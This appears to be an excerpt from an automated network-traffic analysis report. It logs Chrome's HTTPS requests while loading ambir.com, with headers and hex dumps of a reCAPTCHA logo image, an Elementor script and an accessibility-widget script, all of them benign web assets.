                                                                                                                                                                                              Data Ascii: ,d=void 0;d=g(i.selection.args.first)?i.selection.args.first:b("first","Int",i.selection.args.first);var c={alias:i.selection.alias,args:Object.assign({},i.selection.args,{after:a,first:d})};t.addConnection(i.selection.name,c,r.selectionSet)}}function R(t


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              106192.168.2.549848172.217.21.364431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:29 UTC708OUTGET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1
                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:30 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="recaptcha"
                                                                                                                                                                                              Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                              Content-Length: 18160
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Server: sffe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:10:16 GMT
                                                                                                                                                                                              Expires: Wed, 20 Nov 2024 21:00:16 GMT
                                                                                                                                                                                              Cache-Control: public, max-age=3000
                                                                                                                                                                                              Age: 1093
                                                                                                                                                                                              Last-Modified: Wed, 29 Jul 2020 17:15:00 GMT
                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:30 UTC612INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 98 00 00 01 d0 08 06 00 00 00 9c 30 7c 54 00 00 46 b7 49 44 41 54 78 da ec 9d 5b 6c 5c 47 19 c7 47 71 5b 01 6a cb 03 2d a8 d9 99 b3 be a4 b5 89 51 aa 62 89 e4 cc cc 3a de 3d 9b 4b 9b 36 40 23 4b 50 de 00 55 08 21 28 42 26 21 e5 c1 69 bc 17 97 ab a0 8a 6a 10 42 bd 24 3e 67 f6 ec da 25 14 28 0d 75 02 0f 48 08 54 a4 92 aa e4 a1 94 92 50 35 71 13 db bb 67 77 bd 89 bd cc d9 d8 84 48 ae 62 3b de 62 ef f9 ff a4 bf 66 bd 96 fc 64 9d 9f e6 fb be 33 43 00 00 00 00 b0 42 f4 f7 57 d7 59 df cd 6f 8c a7 bc 87 63 e9 d2 3e 6b a0 f0 4d 24 78 89 0e 4c ec df fa e8 78 22 f2 ad 7f ff 40 f6 9d 3e c4 fb 4e ff 5c c7 16 7d 6f 3e 27 fa ce fc 5a ec 3d f3 62 64 ef 5b 63 91 fd 67 8f 77 ec 39 7e 94 f2 e1 0c 13 ea b0 21 9d a7 0c
                                                                                                                                                                                              Data Ascii: PNGIHDR0|TFIDATx[l\GGq[j-Qb:=K6@#KPU!(B&!ijB$>g%(uHTP5qgwHb;bfd3CBWYoc>kM$xLx"@>N\}o>'Z=bd[cgw9~!
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: af 32 d3 dd d1 12 55 ed d4 54 ef 27 00 80 d5 df 8f f1 25 63 f9 92 49 43 32 c8 bb 08 e6 c1 13 57 04 53 f7 a8 ab 76 3f ec bf e2 c9 4d 50 91 7b 5b 7f f7 37 26 ec 17 b4 74 9e 08 0b f5 85 70 c4 fe f8 86 88 ba 9d 00 00 56 e3 4e 46 35 f5 a4 4a cd ba 16 ff 1d 2b 35 3d 6e 25 bd c0 3f 54 91 b9 24 97 2e 98 fa 8b 47 4b 87 bb 15 26 b3 05 2d 9e f3 fa bb 33 3a 27 28 b7 87 18 b7 bf dc 12 cd dd 7d 9b f8 d9 2d 04 00 b0 7a 76 32 b1 83 13 6d b1 54 e1 fb 56 aa 52 84 64 90 5a 92 de 0a 08 a6 fe e2 61 7e 8f 47 8e 78 7a bd 10 e2 ea 4d fd fd 4b 54 b8 07 98 50 bb 9b b7 0c 37 13 00 c0 ea e8 c9 58 e9 e2 68 3c 7d d1 83 64 90 9a 60 0e 4e 55 3b 3e 7d 7c 5e 30 6b 23 22 53 31 e4 c8 94 5e cf 69 d1 bc c2 b8 33 4c fd 72 9a 39 7c 4f 73 cf d8 fb 08 00 e0 ff 53 2e 8b 3e 56 b9 3b fe 78 79 34 9e
                                                                                                                                                                                              Data Ascii: 2UT'%cIC2WSv?MP{[7&tpVNF5J+5=n%?T$.GK&-3:'(}-zv2mTVRdZa~GxzMKTP7Xh<}d`NU;>}|^0k#"S1^i3Lr9|OsS.>V;xy4
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: 1c c7 eb a1 05 b5 50 2f 22 24 33 bb c9 f6 66 11 c1 1e da 9d d9 6d b3 ef 4d a3 a9 88 62 0d 68 11 73 2b ea ad 08 4a f1 90 25 ec bc 97 58 4f 95 1e 8a 27 2d 68 f6 cd 26 22 82 7f ea 41 14 a4 28 f1 4f 63 d3 d2 7a 10 5b 28 36 91 98 ec ee bc 9d cd a6 19 67 77 b3 61 b5 08 ad 79 49 76 77 be 1f f8 5e e7 f8 3e bc f9 fe de 7b c8 5d 24 62 4e 96 75 23 7b 3e 7a 50 c4 db fa b7 58 b0 73 e9 8e 8b cb 0d b9 40 30 40 a9 64 68 26 3f 44 79 e9 37 82 5d 4c 8b 0a e6 b3 d0 2f e6 2d 9b e4 c4 b2 66 e4 ae 44 8d ec 91 76 94 4b 57 fc ac a1 19 ce 74 a3 73 81 60 80 32 06 d3 33 3b fa 32 c5 21 62 97 7e 21 4c 56 42 bf a0 b7 a8 60 62 10 4c 6b c7 74 aa bd cc 5c 4f d2 39 a1 c5 c5 bd 6d d3 b9 90 da ce e5 92 b6 ba 73 81 60 80 42 b9 f8 3b a9 5d 3c 61 71 ef 77 ca dd 95 d0 2f e6 10 0c b2 9e 98 a2 fa
                                                                                                                                                                                              Data Ascii: P/"$3fmMbhs+J%XO'-h&"A(Ocz[(6gwayIvw^>{]$bNu#{>zPXs@0@dh&?Dy7]L/-fDvKWts`23;2!b~!LVB`bLkt\O9ms`B;]<aqw/
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: 44 40 08 11 51 54 b5 bc 20 a8 2a fa 00 02 2a f5 01 26 b1 cf 99 49 82 80 52 2e 02 a9 05 71 49 76 67 d7 01 04 08 68 41 a8 20 48 69 10 f0 82 40 50 89 a2 f0 40 44 c1 8e e7 ba 8e ed e9 99 43 56 aa 2a 23 bc f6 da 3b 76 fe 3f e9 af 5d c9 6f 5e ef f9 f9 fb be 73 ce b4 4a d6 1a 1b f0 af d9 e0 36 3e 64 6e 82 05 15 99 4a 30 a8 60 10 08 06 b4 0e 13 fe 6a ea c4 bb 98 88 27 a8 08 b0 a0 22 53 b5 c8 50 c1 20 10 0c 68 8d b2 9d 9e 40 79 f0 7b ca a3 af a5 64 b0 98 22 68 91 21 10 0c 68 0f 4c 84 9b a9 93 bc c7 1c b4 c6 10 08 06 81 60 40 9b a0 83 f1 0a 4b 84 8f 51 11 1d c2 75 30 08 04 83 40 30 a0 2d 6c 7a e0 b3 63 ca 83 fe 6f 98 93 7c c1 d0 1a 43 20 18 04 82 01 ed 82 39 e1 c5 54 24 2f 61 ee 82 40 30 08 04 03 da 38 d8 1f 3e 85 89 70 2b 13 c9 41 9c 79 41 a6 2b 98 73 af 78 35 25
                                                                                                                                                                                              Data Ascii: D@QT **&IR.qIvghA Hi@P@DCV*#;v?]o^sJ6>dnJ0`j'"SP h@y{d"h!hL`@KQu0@0-lzco|C 9T$/a@08>p+AyA+sx5%
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: cd 76 59 5e 04 43 07 46 a8 12 cc 22 20 7b f4 73 b6 cb 0c 5b 99 21 18 30 0d 2e 77 e2 95 59 0b 86 89 70 02 5b 93 3b 1c 11 1e 96 4b f2 26 e5 e1 45 5b bc 96 17 65 d5 2e a3 4e fc 76 53 32 39 98 c1 48 c1 f8 8b 45 30 4d c9 1c 47 f4 ea 63 78 c0 19 04 03 7e 00 53 8c 5e 65 39 c9 fb 18 ee 77 5e 2e 6a e6 c2 a3 ba 65 27 67 17 6c bb ab 30 23 9a 33 99 b8 39 93 e9 74 05 13 98 5b 47 98 12 cc 22 62 6d b6 95 d9 a8 ed 94 99 84 64 20 18 30 05 e5 87 d2 13 28 f7 ef 66 3c c2 70 bf 93 11 91 8a 29 82 3f 96 ed d1 d3 0b b3 47 b5 cb 4c 1e be 65 b9 87 d4 4c a6 a3 82 e1 81 12 cc 62 dc 7d 49 8a 95 3b 88 51 1b c7 36 66 08 06 fc 1f 8c 07 6b 2c 11 0d 51 07 cf db ef e4 7f f9 b2 d2 98 90 ef ef 2f db c3 a7 b4 f5 f3 bd 47 49 a6 39 93 81 60 e6 08 4d af dc a6 19 f5 31 9c fc 87 60 c0 61 d2 34 5d
                                                                                                                                                                                              Data Ascii: vY^CF" {s[!0.wYp[;K&E[e.NvS29HE0MGcx~S^e9w^.je'gl0#39t[G"bmd 0(f<p)?GLeLb}I;Q6fk,Q/GI9`M1`a4]
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: e7 49 5d 97 1d a9 60 9a 46 0a 46 cb e5 1d 25 97 ca 0f dd 7d 90 0b 04 93 5e f4 10 1d f5 9a ef 63 b9 65 82 c1 3e 0f 6a d1 87 54 07 fb 29 c5 7e 3e 0a fe 03 9d c9 9c 8c 60 28 13 77 9b 26 98 ae 05 3a 73 d9 85 cc 05 82 49 3d c4 11 8b a9 d7 f8 02 82 49 ee 8d 17 ca e4 06 aa 1f 10 4b 37 77 3e df ce 64 5a 13 10 cc 24 72 e9 1b 46 e6 02 c1 98 b1 9e bf c0 c4 43 94 05 fb 21 98 24 aa 97 20 b4 59 50 25 83 ad 52 8f 9a 35 ca 18 00 8d 32 19 47 7c 79 5c c9 44 95 9d 16 4c c3 18 c1 64 73 95 59 c8 5c 20 18 63 b8 8b 87 17 13 b7 ee 10 2e 6b 68 51 4e 26 7b a1 4c 8e 50 16 5e 62 58 ae a7 24 53 d7 99 cc e4 82 91 4d e2 89 c5 5a 30 06 04 fa dd f9 ca 77 c8 5c 20 18 63 b8 7d b0 7a 3d 71 e5 3a ec 1f 8b fd b4 ff d0 ab d4 6d 14 75 f5 62 18 0b d7 2a c9 b8 62 3b f5 c6 5b 93 5c 91 8d 1f 11 4c
                                                                                                                                                                                              Data Ascii: I]`FF%}^ce>jT)~>`(w&:sI=IK7w>dZ$rFC!$ YP%R52G|y\DLdsY\ c.khQN&{LP^bX$SMZ0w\ c}z=q:mub*b;[\L
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: 99 f8 88 e4 ca 6b 1b 67 6f ba f2 84 00 d0 73 81 08 98 4c 86 4a 39 45 a2 74 ed 88 28 21 60 cc b9 07 59 74 d0 53 d1 b7 c6 78 04 82 00 d2 b0 2c d6 98 67 41 cf 05 22 60 cc 41 f4 85 4b 45 5f ec 18 02 c6 a4 5b f4 57 84 7b c5 8a e8 b2 b2 1d 58 a2 9c 9e 4b 91 35 ea b9 04 11 2e 30 ae d5 c9 06 ac 0e f6 81 00 78 67 30 91 c5 14 2e 1d 58 a2 6c ce 23 92 29 ac 3b 45 5f 48 8c 3f f6 17 a4 57 b8 c4 7b 2e 08 17 38 6a 06 73 95 5e 37 09 80 37 60 fa 57 88 52 f8 37 04 8c 39 4b 94 45 29 f6 5d 49 65 78 a6 00 d2 2a 5c d0 73 81 e3 04 4c c8 e6 54 3f 11 00 6f c0 84 5f 15 bd d1 93 08 18 93 1a fc 52 74 27 95 c8 a6 0a 20 3d c2 a5 38 30 c7 52 20 ff 8a 70 81 e3 04 4c 38 cb a9 79 05 c0 07 0d 8a ab c8 53 08 98 54 8d e8 1e 6f f8 06 f9 a1 cb d7 ff 94 00 d2 20 5c d8 9c a9 76 f6 13 7a 2e f0 0e
                                                                                                                                                                                              Data Ascii: kgosLJ9Et(!`YtSx,gA"`AKE_[W{XK5.0xg0.Xl#);E_H?W{.8js^77`WR79KE)]Iex*\sLT?o_Rt' =80R pL8ySTo \vz.
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: 17 b7 dd 21 e4 02 00 08 86 c4 9c b9 8c f9 3b 72 01 00 04 43 e2 c4 ed 34 e9 8c 0f 0e 0e b2 2c 06 00 08 86 c4 ad b9 38 c8 05 00 10 0c 89 26 17 6a 2e 00 80 60 48 f4 65 31 6a 2e 00 80 60 48 f4 99 0b 35 17 00 40 30 a4 34 72 61 e6 02 00 08 86 44 af b9 48 3a 8c 5c 20 90 65 d9 fc 04 00 c1 90 18 cf b9 b0 5b 0c a6 09 67 cc 59 30 db 3b 3a 3a 16 25 00 08 86 b0 15 19 62 d1 d7 d7 57 ef d3 1b c6 fd 2a 86 26 24 03 08 86 50 73 81 28 b4 b5 b5 2d 93 74 73 78 78 38 ec 28 9c 70 ff 38 c9 a9 d9 80 60 c8 1f d5 5c 24 3d f2 a9 c8 d4 5c e0 07 cd cd cd f3 dc 37 4e 85 ad ea df cf a0 2b 48 9a 70 1a 99 c9 00 82 21 bf 4c f8 df 53 73 81 62 a4 69 ba de e3 73 34 88 25 f4 95 19 92 79 e3 ef 27 98 c9 00 82 21 b9 91 34 15 17 70 cf 38 4b 13 80 ef 84 9b 0d f7 91 8b 33 e4 32 4b 32 1e b3 af 79 83
                                                                                                                                                                                              Data Ascii: !;rC4,8&j.`He1j.`H5@04raDH:\ e[gY0;::%bW*&$Ps(-tsxx8(p8`\$=\7N+Hp!LSsbis4%y'!4p8K32K2y
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: 4d 91 fd f2 9d 6b 59 ee f6 7a 3a bc bf 7c bb d5 63 7f 09 91 f9 c0 63 c5 5a 44 06 43 60 a0 e4 29 cd 3e 1e 77 1f e8 f5 40 7a 5f 5f 5f df f2 9e 9e 9e cb 33 19 84 c5 2c b3 97 b7 c5 ed 73 50 d2 29 b7 55 bd ff 28 09 91 19 71 3f 59 83 c8 60 08 0c 94 9c 9f c9 e7 13 26 24 ed 77 8e e1 09 7b 35 2b f3 93 01 ea 69 20 89 12 2f 8d 21 2c 16 da 47 25 bd 67 fe cc 4f 92 a8 fb 7e 52 10 19 49 c3 23 23 23 eb 10 19 0c 81 81 b9 78 34 53 3e 7e 22 69 bb 69 1d 1d 1d 5d 9a f7 6a 2e aa d5 bd 5a 62 ca b1 eb b8 35 d9 63 79 d2 9f 7d 50 d2 1f 08 4b d1 75 32 39 1f 87 c3 93 61 da 3b 86 c0 c0 5c a7 36 07 87 dd 37 de 70 1f 79 cc ac 8d 15 eb 31 fb 2c 06 96 1a d8 17 bf d1 9f e9 6a 49 77 f8 73 ef 8c 15 ec 92 72 f1 d9 f9 3e 94 24 32 43 ee 0f ab f1 64 30 04 06 e6 2c 34 81 a4 d3 ee 27 df 98 d7 25
                                                                                                                                                                                              Data Ascii: MkYz:|ccZDC`)>w@z___3,sP)U(q?Y`&$w{5+i /!,G%gO~RI###x4S>~"ii]j.Zb5cy}PKu29a;\67py1,jIwsr>$2Cd0,4'%
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1390INData Raw: fd e5 44 34 46 20 10 8c e6 ff 5e 06 f8 7b b6 b9 96 c5 ae 15 9f 35 76 59 c1 a1 d7 8b 82 0d cd 64 56 f7 63 fb 32 00 71 3b 73 b1 05 73 9e fb 9f 10 d1 38 81 40 30 ba e5 c2 1c e5 fe 0a b7 5c ae 9d 59 79 d6 b8 0f 0a 9b df 2d 32 ea 7f 97 2a 84 33 32 00 c4 a1 5c 78 59 fc 22 f7 f3 89 28 45 20 10 8c 07 72 f9 83 bf 5f 3a 11 4d 16 37 98 d4 cf ac 94 74 df c1 2c bf 51 7f 9c 54 15 24 03 40 7c cd 5c da b9 f5 0f 8f 7d 04 82 d1 5d 73 b1 e5 c2 fd 8c 91 fc 82 3d 99 dd 39 31 a3 e8 e0 ea 52 d9 70 5c aa ca 41 48 06 80 b8 98 b9 74 70 3f 10 0c 06 ef 17 08 04 e3 45 cd c5 96 4b 20 10 98 22 46 98 39 9f 76 dd b3 d2 df bc 76 9b b1 eb 94 54 38 ed 0f c0 28 97 4b 27 b7 c1 48 24 f2 80 40 20 18 0f 96 c5 6c b9 ac 70 e4 a2 23 4f e7 74 df 9b e9 fb 65 3d 4b e6 0c 99 21 cc 64 00 18 85 72 61 ba
                                                                                                                                                                                              Data Ascii: D4F ^{5vYdVc2q;ss8@0\Yy-2*32\xY"(E r_:M7t,QT$@|\}]s=91Rp\AHtp?EK "F9vvT8(K'H$@ lp#Ote=K!dra


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              107192.168.2.549856141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1681OUTGET /wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:31 UTC490INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:30 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 15:42:06 GMT
                                                                                                                                                                                              ETag: W/"673e034e-550"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13818
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fd4cf39c3eb-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:31 UTC879INData Raw: 35 35 30 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 35 2e 30 20 2d 20 31 39 2d 31 31 2d 32 30 32 34 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 35 37 5d 2c 7b 31 33 32 37 3a 28 65 2c 74 29 3d 3e 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 63 6c 61 73 73 20 54 65 78 74 45 64 69 74 6f 72 20 65 78 74 65 6e 64 73 20 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 66 72 6f
                                                                                                                                                                                              Data Ascii: 550/*! elementor - v3.25.0 - 19-11-2024 */"use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[357],{1327:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class TextEditor extends elementorModules.fro
                                                                                                                                                                                              2024-11-20 20:28:31 UTC488INData Raw: 20 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 61 72 61 67 72 61 70 68 3b 69 66 28 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 65 2e 68 74 6d 6c 28 29 2e 72 65 70 6c 61 63 65 28 2f 26 6e 62 73 70 3b 2f 67 2c 22 20 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 2f 5e 20 2a 28 5b 5e 20 5d 20 3f 29 2f 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 70 3d 72 5b 31 5d 2c 73 3d 70 2e 74 72 69 6d 28 29 3b 69 66 28 22 3c 22 3d 3d 3d 73 29 72 65 74 75 72 6e 3b 74 68 69 73 2e 64 72 6f 70 43 61 70 4c 65 74 74 65 72 3d 70 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 43 61 70 4c 65 74 74 65 72 2e 74 65 78 74 28 73 29 3b 63 6f 6e 73 74 20 61 3d 74 2e 73 6c 69 63 65 28 70 2e 6c 65 6e 67 74 68 29 2e 72 65 70
                                                                                                                                                                                              Data Ascii: e=this.elements.$paragraph;if(!e.length)return;const t=e.html().replace(/&nbsp;/g," "),r=t.match(/^ *([^ ] ?)/);if(!r)return;const p=r[1],s=p.trim();if("<"===s)return;this.dropCapLetter=p,this.elements.$dropCapLetter.text(s);const a=t.slice(p.length).rep
                                                                                                                                                                                              2024-11-20 20:28:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              108192.168.2.549858172.67.11.1554431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC358OUTGET /apps/app/dist/js/app.js HTTP/1.1
                                                                                                                                                                                              Host: acsbapp.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:31 UTC840INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Content-Length: 437268
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              x-goog-generation: 1732031737349367
                                                                                                                                                                                              x-goog-metageneration: 3
                                                                                                                                                                                              x-goog-stored-content-encoding: identity
                                                                                                                                                                                              x-goog-stored-content-length: 437268
                                                                                                                                                                                              x-goog-hash: crc32c=MvisdQ==
                                                                                                                                                                                              x-goog-hash: md5=6FSlj+WLD8tyR4ONBkfNNw==
                                                                                                                                                                                              x-goog-storage-class: STANDARD
                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                              access-control-expose-headers: *
                                                                                                                                                                                              x-guploader-uploadid: AFiumC7CUrlhQfHz811GExfHPJ645ta5J_nSjeRvHiIjMajPhYJqOMWc675XX7PvbX4_hwEwixo
                                                                                                                                                                                              expires: Thu, 20 Nov 2025 20:28:31 GMT
                                                                                                                                                                                              Cache-Control: public, max-age=300, must-revalidate
                                                                                                                                                                                              last-modified: Tue, 19 Nov 2024 15:55:37 GMT
                                                                                                                                                                                              etag: "e854a58fe58b0fcb7247838d0647cd37"
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fd58a0e7c6a-EWR
                                                                                                                                                                                              2024-11-20 20:28:31 UTC529INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 7b 72 65 74 65 6e 74 69 6f 6e 50 65 72 69 6f 64 44 61 79 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 74 2c 64 61 79 73 42 65 66 6f 72 65 4e 6f 74 69 63 65 3a 69 2c 70 72 6f 64 75 63 74 4e 61 6d 65 3a 6e 2c 76 65 72 73 69 6f 6e 3a 73 2c 69 67 6e 6f 72 65 50 61 74 74 65 72 6e 3a 61 7d 29 7b 69 66 28 61 2e 73 6f 6d 65 28 28 65 3d 3e 52 65 67 45 78 70 28 65 29 2e 74 65 73 74 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 29 29 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6f 3d 28 2d 31 2a 28 44 61 74 65 2e 6e 6f 77 28 29 2d 74 2d 32 34 2a 65 2a 36 30 2a 36 30 2a 31 65 33 29 2f 38 36 34 65 35 29 2e 74 6f 46 69 78 65 64 28 32 29 3b 6f 3c 3d 69 26 26 6f 3e 3d 30 3f 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e
                                                                                                                                                                                              Data Ascii: !function({retentionPeriodDays:e,timestamp:t,daysBeforeNotice:i,productName:n,version:s,ignorePattern:a}){if(a.some((e=>RegExp(e).test(document.currentScript.src))))return;const o=(-1*(Date.now()-t-24*e*60*60*1e3)/864e5).toFixed(2);o<=i&&o>=0?console.warn
